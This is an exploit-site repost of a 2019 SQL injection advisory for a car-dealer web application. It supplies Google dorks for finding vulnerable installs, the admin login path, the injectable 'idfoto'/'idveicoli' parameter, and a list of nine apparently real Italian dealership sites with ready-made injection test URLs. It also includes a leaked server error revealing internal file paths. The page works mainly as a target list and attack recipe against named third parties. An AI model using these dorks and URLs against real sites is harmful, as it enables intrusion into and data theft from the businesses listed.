Advertisement






AutoLore VillMotor CrisciCars idveicoli SQL Injection

CVE Category Price Severity
CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2019-06-17
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060108

Below is a copy:

AutoLore VillMotor CrisciCars idveicoli SQL Injection
###################################################################

# Exploit Title : AutoLore VillMotor CrisciCars idveicoli SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/06/2019
# Vendor Homepage : autolore.it
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
inurl:/index.php?pagina=parcoclienti site:it
inurl:/index.php?pagina=occasioni site:it
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : http://www.exploit4arab.org/exploits/2404

###################################################################

# Impact :
***********
AutoLore VillMotor CrisciCars Motta Sant'Anastasia idveicoli is prone to an SQL-injection 
vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# Admin Panel Login Path :
*************************
/admin/login.php

# SQL Injection Exploit :
**********************
/index.php?pagina=foto&idveicoli=[ID-NUMBER]&idfoto=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] autolore.it/index.php?pagina=foto&idveicoli=7&idfoto=1%27

[+] melisautomobili.it/index.php?pagina=foto&idveicoli=1&idfoto=1%27

[+] gulinoauto.it/index.php?pagina=foto&idveicoli=1%27

[+] villmotor.com/index.php?pagina=foto&idveicoli=7&idfoto=1%27

[+] criscicars.it/index.php?pagina=foto&idveicoli=7&idfoto=1%27

[+] glautocatania.com/index.php?pagina=foto&idveicoli=7&idfoto=1%27

[+] autoleadersnc.com/index.php?pagina=foto&idveicoli=7&idfoto=1%27

[+] autotamsrl.it/index.php?pagina=foto&idveicoli=7&idfoto=1%27

[+] fpcar.it/new/index.php?pag=foto&idveicoli=1%27

###################################################################

# Example SQL Database Error :
****************************
Fatal error: Uncaught exception 'PDOException' with message 
'SQLSTATE[42000]: Syntax error or access violation: 1064 You have 
an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near '' at line 
1' in /web/htdocs/www.autotamsrl.it/home/foto.php:23 Stack trace:
 #0 /web/htdocs/www.autotamsrl.it/home/foto.php(23): PDO->
query('update veicoli ...') #1 /web/htdocs/www.autotamsrl.it/home
/switch.php(57): include('/web/htdocs/www...') #2 /web/htdocs
/www.autotamsrl.it/home/head.php(111): include('/web/htdocs
/www...') #3 /web/htdocs/www.autotamsrl.it/home/index.php(3):
 include('/web/htdocs/www...') #4 {main} thrown in /web
/htdocs/www.autotamsrl.it/home/foto.php on line 23

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.